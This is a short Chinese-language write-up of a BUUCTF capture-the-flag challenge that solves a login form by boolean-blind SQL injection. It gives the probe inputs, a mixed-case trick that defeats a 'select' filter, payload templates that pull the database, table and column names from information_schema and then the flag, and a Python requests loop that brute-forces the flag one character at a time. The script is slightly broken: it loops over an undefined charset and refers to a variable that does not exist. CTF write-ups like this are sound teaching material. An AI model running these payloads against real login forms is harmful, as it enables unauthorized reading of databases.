sql注入-布尔盲注
以buuctf上的题具体来说
题目链接
方法一:布尔注入
方法二:报错注入
解题:
首先查看源代码:可以得到提示:得到一种思路:报错注入
这里拿布尔注入具体来说:
首先拿Bp判断:
- 输入name=admin &pass=1时:urldecode解码得到密码错误
- name=1’or 1=1 # &pass=1 得到与1相同结果
- name=1’or 1=2 # &pass=1得到是字符型注入
解释: 第一句是admin用户名是对的,密码不对 和第二局相对照 :因为是字符型注入 所以1=1逃逸or 后面语句得到执行 用户名绕过 也验证三 :结果是不正确 =>可以利用字符型布尔注入来判断
这里有个坑就是select 被替换过滤了->应该用到str_replace(‘select’,’ ',sql语句)函数
这里用了大小写绕过
执行代码:
- 查询数据库名的语句:
1'or substr(database(),%d,1 )='%c'#
- 查询数据库的表明:
1'or substr((seLEct table_name from information_schema.tables where table_schema='note' limit %d,1),%d,1 )='%c'#
- 查询数据库的列名
1'or substr((seLEct column_name from information_schema.columns where table_name='fl4g' limit %d,1),%d,1 )='%c'#
- 查flag
1'or substr((seLEct flag from fl4g),%d,1)='%c'#
主干代码: 思想:利用报错信息回显判断字符是否正确
r"\u8d26\u53f7\u6216\u5bc6\u7801\u9519\u8bef"
import requests
a= {"error":1,"msg":"\u8d26\u53f7\u4e0d\u5b58\u5728"}
url='http://d0bd929f-bbec-4a43-8b93-c0934de8d5a6.node3.buuoj.cn/login.php'
sql="1'or substr((seLEct flag from fl4g),%d,1)='%c'#"
for i in range(0, 8):
for j in dict:
data = {
'name': sql0%(i,j),
'pass': 's'
}
r = requests.post(url=url, data=data)
if (r"\u8d26\u53f7\u6216\u5bc6\u7801\u9519\u8bef" in r.text):
print(j, end='')
print('-------------')
学习产出:
利用post 得到回显信息进行布尔注入